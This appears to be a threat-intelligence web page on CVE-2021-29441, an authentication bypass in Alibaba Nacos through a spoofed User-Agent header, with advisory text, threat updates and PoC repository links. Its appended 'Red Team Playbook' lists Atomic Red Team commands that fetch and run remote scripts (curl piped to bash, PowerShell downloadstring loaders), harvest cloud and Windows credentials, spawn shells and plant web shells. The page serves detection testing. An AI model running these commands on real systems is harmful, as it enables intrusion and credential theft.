CVE-2021-29441
Overview
This vulnerability is an authentication bypass in Alibaba Nacos versions prior to 1.4.1. The root cause lies in the AuthFilter servlet filter, which is designed to enforce authentication but contains a backdoor mechanism. This backdoor allows requests with a specific User-Agent HTTP header to bypass the authentication checks, affecting the authentication enforcement component of the Nacos server.
Vulnerability Description
Nacos is a platform designed for dynamic service discovery and configuration and service management. In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true) Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that enables Nacos servers to bypass this filter and therefore skip authentication checks. This mechanism relies on the user-agent HTTP header so it can be easily spoofed. This issue may allow any user to carry out any administrative tasks on the Nacos server.
Impact
An attacker with network access can exploit this vulnerability without authentication or user interaction by spoofing the User-Agent HTTP header to bypass authentication controls. This enables the attacker to perform any administrative task on the Nacos server, including configuration changes and service management. Given the CVSS vector (AV:N/AC:L/PR:N/UI:N), the vulnerability is remotely exploitable with low complexity and no privileges required, potentially leading to unauthorized control over the affected service.
Solution
Upgrade Alibaba Nacos to version 1.4.1 or later, where the authentication bypass backdoor in the AuthFilter servlet filter has been removed. Refer to the official GitHub advisory GHSA-36hp-jr8h-556f and pull request #4703 for detailed patch information and instructions. No alternative workarounds are documented; applying the vendor patch is required to remediate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Nacos platform arises from a flaw in its authentication mechanism when configured to enforce user authentication. Specifically, the AuthFilter servlet filter, which is intended to regulate access to the server, contains a backdoor that allows Nacos servers to bypass authentication checks. This backdoor is exploited through the manipulation of the user-agent HTTP header, which can be easily spoofed by an attacker. As a result, unauthorized users can gain administrative access to the Nacos server, compromising the integrity and security of the entire service management system. The severity of this vulnerability is underscored by its high CVSS score, indicating a critical risk to systems utilizing this platform.
Attack vectors for this vulnerability are straightforward, as they primarily involve sending crafted HTTP requests with a spoofed user-agent header. An attacker can leverage this weakness to impersonate legitimate users, thereby executing administrative tasks without proper authorization. Scenarios may include altering configurations, accessing sensitive information, or even disrupting service availability. The simplicity of the exploitation process makes it particularly dangerous, as it does not require advanced technical skills, thus broadening the potential threat landscape to include less sophisticated attackers.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on Nacos for service discovery and configuration management. If exploited, an attacker could manipulate critical configurations, leading to service outages, data breaches, or unauthorized access to sensitive information. The business risks associated with such an incident are substantial, including potential financial losses, reputational damage, and regulatory penalties. Organizations may face increased scrutiny from stakeholders and customers, particularly if sensitive data is compromised or if service disruptions affect business operations.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Regular security audits and vulnerability assessments can help identify systems running affected versions of Nacos. Additionally, organizations should monitor HTTP traffic for unusual patterns, particularly focusing on user-agent headers that deviate from expected values. Updating to the latest version of Nacos, which addresses this vulnerability, is critical. Furthermore, employing web application firewalls (WAFs) can provide an additional layer of protection by filtering out malicious requests before they reach the server.
In conclusion, the vulnerability in the Nacos platform represents a serious threat to organizations utilizing this service management tool. Its ability to bypass authentication through a simple header manipulation poses significant risks, making it essential for organizations to prioritize detection and mitigation strategies. By staying informed about vulnerabilities, maintaining up-to-date software, and implementing robust security measures, organizations can better protect themselves against potential exploitation and the associated business risks.
CSURFACE threat intelligence has identified a slight increase in detection activity related to CVE-2021-29441, indicating a modest uptick in attempts to exploit the Nacos authentication bypass vulnerability. Although the EPSS score shows a marginal decline, the persistence of high exploitability potential underscores ongoing attacker interest. Our telemetry reveals that adversaries continue to leverage the user-agent header manipulation technique to circumvent authentication controls, maintaining this vulnerability as a viable attack vector. The absence of new proof-of-concept exploits suggests that threat actors are relying on existing methods rather than innovating new attack techniques at this time. This subtle rise in exploitation attempts, coupled with the vulnerability’s critical severity, reinforces the need for defenders to maintain vigilant monitoring. While the overall threat level remains critical, the current trend signals sustained adversary engagement rather than rapid escalation, emphasizing a steady but persistent exploitation risk.
Update 2 — May 15, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2021-29441, with telemetry indicating a significant uptick in adversary activity leveraging the authentication bypass in Nacos servers. Although no new proof-of-concept exploits have surfaced, the increased frequency of exploitation attempts suggests that threat actors are intensifying their efforts to capitalize on this vulnerability, likely due to its ease of exploitation via a spoofed user-agent header. This heightened activity underscores the vulnerability’s continued attractiveness as an attack vector and signals persistent adversary engagement rather than a transient spike. Consequently, the risk level remains critical, with an elevated likelihood of successful unauthorized access incidents if defenses are not rigorously maintained. Defenders should interpret this trend as a clear indication that exploitation attempts are becoming more frequent, reinforcing the need for sustained vigilance in monitoring and detection capabilities.
Update 3 — May 23, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2021-29441, with our telemetry indicating a sustained increase in adversary activity leveraging the user-agent header bypass. This persistent uptick reflects ongoing attacker interest and suggests that threat actors continue to prioritize this vulnerability as a viable access vector despite its age. Notably, no new proof-of-concept exploits have emerged publicly, indicating that adversaries rely on existing techniques rather than novel methods. The stable EPSS score corroborates this steady exploitation pattern rather than an accelerating trend. For defenders, this means that the vulnerability remains a critical risk due to its ease of exploitation and the demonstrated persistence of threat actors. The threat level remains elevated, underscoring the necessity for continuous monitoring and robust detection strategies to identify and mitigate unauthorized access attempts exploiting this authentication bypass.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Alibaba | Nacos | All |
cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
K3ysTr0K3R/CVE-2021-29441
CVE-2021-29441 - Nacos Authentication Bypass
|
K3ysTr0K3R | 0 | 0 | 2026-06-25 | View |
|
hh-hunter/nacos-cve-2021-29441
|
hh-hunter | 0 | 0 | 2021-10-05 | View |
|
azhao1981/CVE-2021-29441
|
azhao1981 | 0 | 0 | 2024-12-04 | View |
Threat Feed
31 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-29441 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/alibaba/nacos/issues/4701 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/advisories/GHSA-36hp-jr8h-556f |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/alibaba/nacos/pull/4703 |